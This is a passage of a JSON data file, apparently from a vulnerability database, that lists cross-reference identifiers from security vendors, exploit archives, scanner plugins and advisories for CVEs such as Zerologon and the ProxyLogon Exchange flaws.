"1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "241CA368-5AF2-555C-91EE-5D10B229F97D", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "256984DC-A742-53F8-889F-2071EC134734", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3019C843-FE2F-527C-B7C1-14A1C3066721", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "35B21CE7-1E51-5824-B70E-36480A6E8763", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3F400483-1F7E-5BE5-8612-4D55D450D553", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "4987606C-EB9B-581F-913D-36468DE9160E", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "51858F11-1259-5A40-82DF-DD7D62A7B11A", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5C5A7007-2357-5029-9DDC-D8A6179AF77D", "5DD13827-3FCE-5166-806D-088441D41514", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63C36F7A-5F99-5A79-B99F-260360AC237F", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "6787DC40-24C2-5626-B213-399038EFB0E9", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "721C46F4-C390-5D23-B358-3D4B22959428", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "7758268F-2004-536A-B51F-62DA1E5A992D", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7CEBB62C-173B-50CD-A252-B6522523EE57", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8BFFE465-7960-5431-8861-F43B886BB2C9", "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "939F3BE7-AF69-5351-BD56-12412FA184C5", "97241AF4-CDE8-5BD1-9A87-B08D8D6BE17F", "988A0BAB-669A-57AE-B432-564B2E378252", "99AE64E6-B01B-5B4F-A9AB-263630AA5414", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9C9BD402-511C-597D-9864-647131FE6647", "9E82678F-0559-56B2-94DC-6505FE64555C", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA1F18A9-BE39-58BE-8639-9A0BF8F6AB20", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C1631982-501B-5433-8360-6D33D931706B", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF2E9209-48FF-5375-8638-93E7CC964EB3", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "E2A4C4A7-DB29-591E-810E-A216F49A9CDF", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E90678A1-4183-5E58-A4E2-5E48E8767D92", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F5339382-9321-5B96-934D-B803353CC9E3", "FACAC587-D738-561E-B976-3A97B6202667", "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:1119224", "H1:1119228", "H1:534630", "H1:536134", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1", "CBB1F0F0AF16A09B88EDDD5E242727A3EF12C793CFCE5ED8C34772D7D40B12CB"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11417", "KLA11689", "KLA11692", "KLA11929", "KLA11931", "KLA12103"]}, {"type": "kitploit", "idList": ["KITPLOIT:3701426813255055656", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2019-0604", "MS:CVE-2020-0787", "MS:CVE-2020-1472", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5000978"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["700224.PRM", "700228.PRM", "700229.PRM", "700230.PRM", "701078.PRM", "701262.PRM", "ACCELLION_FTA_9_12_380.NASL", "AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CROWD_3_4_4.NASL", "CROWD_CVE-2019-11580.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DLA-2463.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-202012-24.NASL", "HAFNIUM_IOC_DETECT.NBIN", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "PULSE_CONNECT_SECURE-SA44784.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_MAR_4538461.NASL", "SMB_NT_MS20_MAR_4540670.NASL", "SMB_NT_MS20_MAR_4540673.NASL", "SMB_NT_MS20_MAR_4540681.NASL", "SMB_NT_MS20_MAR_4540688.NASL", "SMB_NT_MS20_MAR_4540689.NASL", "SMB_NT_MS20_MAR_4540693.NASL", "SMB_NT_MS20_MAR_4541506.NASL", "SMB_NT_MS20_MAR_4541509.NASL", "SMB_NT_MS20_MAR_4541510.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "VMWARE_VCENTER_CVE-2021-21985.NBIN", "VMWARE_VCENTER_VMSA-2021-0010.NASL", "WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368", "WEB_APPLICATION_SCANNING_113244", "WEB_APPLICATION_SCANNING_98216", "WEB_APPLICATION_SCANNING_98564", "WEB_APPLICATION_SCANNING_98565", "WEB_APPLICATION_SCANNING_98566", "WEB_APPLICATION_SCANNING_98567", "WEB_APPLICATION_SCANNING_98568", "WEB_APPLICATION_SCANNING_98569", "WEB_APPLICATION_SCANNING_98570", "WEB_APPLICATION_SCANNING_98656", "WEB_APPLICATION_SCANNING_98657", "WEB_APPLICATION_SCANNING_98658", "WEB_APPLICATION_SCANNING_98659", "WEB_APPLICATION_SCANNING_98660"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108438", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310815788", "OPENVAS:1361412562310815789", "OPENVAS:1361412562310815790", "OPENVAS:1361412562310815791", "OPENVAS:1361412562310815792", "OPENVAS:1361412562310815793", "OPENVAS:1361412562310815796", "OPENVAS:1361412562310815797", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:DLA-2463-1", "OSV:DSA-4156-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:158056", "PACKETSTORM:160127", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163487", "PACKETSTORM:163810"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", "idList": ["SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:97207", "SSV:99260"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-106914", "SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D6DE736915C69A194D894AE9BED7EC57", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:43A16BBDCD3B020E360EE37C48B44088", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:4DE731C9D113C3993C96A773C079023F", 